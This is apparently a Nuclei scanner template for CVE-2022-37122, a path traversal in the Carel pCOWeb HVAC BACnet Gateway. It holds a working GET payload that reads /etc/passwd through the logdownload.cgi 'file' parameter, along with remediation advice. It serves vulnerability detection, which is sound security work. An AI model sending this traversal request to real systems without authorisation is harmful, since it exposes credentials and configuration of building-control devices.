id: CVE-2022-37122

info:
  name: Carel pCOWeb HVAC BACnet Gateway 2.1.0 - Path Traversal
  author: gy741
  severity: high
  description: |
    Carel pCOWeb HVAC BACnet Gateway 2.1.0 contains an unauthenticated arbitrary file disclosure caused by improper verification of the 'file' GET parameter in logdownload.cgi, letting attackers disclose sensitive files via directory traversal, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can read arbitrary files from the Carel pCOWeb HVAC BACnet Gateway through directory traversal in the logdownload.cgi file parameter, potentially exposing sensitive configuration files, credentials, and HVAC system data.
  remediation: |
    Update Carel pCOWeb HVAC BACnet Gateway to a version later than 2.1.0 that properly validates file paths in logdownload.cgi.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5709.php
    - https://www.zeroscience.mk/codes/carelpco_dir.txt
    - https://packetstormsecurity.com/files/167684/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-37122
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-37122
    cwe-id: CWE-22
    epss-score: 0.18189
    epss-percentile: 0.9684
  metadata:
    max-request: 1
    vendor: carel
    product: pcoweb_hvac_bacnet_gateway
  tags: cve,cve2022,carel,lfi,traversal,unauth,bacnet,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd"

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
# digest: 4b0a004830460221008ed64cf2c5049965cd0f8d703f057f2c6d259ef291051d76e61252a9150049f1022100ca8eb83c2e3a4eec77d5c06c043b3275878f0b6f38b0641397e65fbff2f3eb8a:922c64590222798bb761d5b6d8e72950